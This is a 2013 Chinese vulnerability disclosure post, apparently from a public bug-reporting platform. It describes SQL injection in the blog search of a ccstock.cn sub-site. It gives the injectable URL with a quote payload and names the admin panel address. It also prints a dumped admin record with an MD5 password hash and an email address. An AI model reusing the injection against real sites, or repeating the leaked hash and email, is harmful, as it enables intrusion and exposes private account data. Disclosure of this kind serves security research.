漏洞概要
关注数(24)
关注此漏洞
漏洞标题:
中国资本证券网某子站SQL注入可进入后台
>
漏洞详情
披露状态:
2013-08-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中国资本证券网某子站由于对关键字过滤不严,导致SQL注入。
详细说明:
blog子站的搜索功能未对用户输入进行过滤,从而导致SQL注入。
http://blog.ccstock.cn/search/index?type=blog&keyword=%27

还是个root!
漏洞证明:
1. 爆WEB路径:
直接搜索'
2. 数据库内容
3. 子站后台管理信息
http://ads.ccstock.cn/admin/index.php
Database: phpadsnew
Table: phpads_config
[1 entry]
+-------+----------------------------------+----------------+
| admin | admin_pw | admin_email |
+-------+----------------------------------+----------------+
| admin | a6cd7fc0a8de6f99d1e735735ac6ca72 | all@ccstock.cn |
+-------+----------------------------------+----------------+
CMD5不给力,解不出来,另一个子站就没这么幸运了。
后台地址可以直接google到。


修复方案:
>
漏洞回应